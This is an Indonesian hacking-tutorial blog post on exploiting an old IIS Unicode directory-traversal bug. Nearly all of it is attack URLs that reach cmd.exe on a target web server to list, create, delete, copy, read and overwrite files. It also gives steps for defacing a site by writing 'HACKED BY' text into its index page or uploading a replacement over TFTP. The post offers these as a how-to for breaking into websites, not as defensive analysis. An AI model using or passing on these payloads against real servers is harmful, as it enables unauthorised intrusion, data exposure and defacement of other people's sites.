DIBACA YO,,,,,,,,,,!?????

Laman

lintas berita n banner temen

belajar hack website / situs part3

CARA MEMANFAATKAN IIS BUGS LEBIH DARI SATU CARA:

Bugs-bugs IIS bisa langsung kita praktekkan melalui explorer dengan memanfaatkan file cmd.exe agar semua perintah (command) yang kita minta terlaksana.

CONTOH BUGS INI DAN APLIKASI COMMAND:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:

COMMAND UNTUK MEMBUAT PENUNJUK BARU:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+cJ

COMMAND UNTUK MEN-DELETE PETUNJUK:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+rd+cJ

COMMAND UNTUK MENG-COPY:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpubscriptsDJ.exe

COMMAND UNTUK MENGHAPUS:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+c:inetpubwwwrootindex.asp

COMMAND UNTUK ME-RENAME FILE:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ren+cJ.htm+DJKING.htm
COMMAND UNTUK MELIHAT ISI FILE:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+type+c:index.htm

COMMAND UNTUK MENULISKAN SESUATU DALAM FILE APA SAJA:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+echo+HACKED+BY+DJ+KING+>+cJ.txt

INGAT: Kadang kita perlu merubah nama petunjuk (exentition) menjadi: msadc, scripts, _vit_admin, iisadmpwd, _vti_bin, cgi-bin, .samples.



SEKARANG, UNTUK MERUBAH TAMPILAN AWAL (HOME) SEBUAH SITUS, MAKA HARUS:

• Menuliskan sesuatu pada Home dengan menggunakan perintah echo
• Meng-apload tampilan buatan Antum melalui program TFTP
• Menuliskan sesuatu pada file Home sebuah situs (file: index.html) adalah menggunakan command echo.

Sebagai dasar, Antum harus terlebih dahulu meng-copy file cmd.exe ke folder scripts, caranya seperti ini –sekedar contoh saja:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpubscriptsDJ.exe

Nah, setelah meng-copy file ini, selanjutnya bisa dilakukan pemeriksaan terhadap bugs lain yang ada di situs tersebut, caranya:
http://www.xxx.com/scripts/DJ.exe/c+dir+c:

Setelah itu, command echo baru bisa dijalankan, caranya adalah:
http://www.xxx.com/scripts/DJ.exe?/...hackermail.com+>+c:inetpubwwwrootindex.htm

CATATAN PENTING:
File indeks utama sebuah situs tidak selalunya bernama index.htm, bisa saja namanya: default.html, index.html, default.asp, default.htm. Jadi, pastikan dulu nama file indeksnya.
Tapi, biasanya index.htm lah yang sering dipakai. Ada kemungkinan juga bahwa file indeks berada di selain folder wwwroot, jadi harus dicari.

google translate

MISTERY TELAGA MERAH BLOG

widgeo.net
free counters


free web site trafffic and promotion
Widget By: Forantum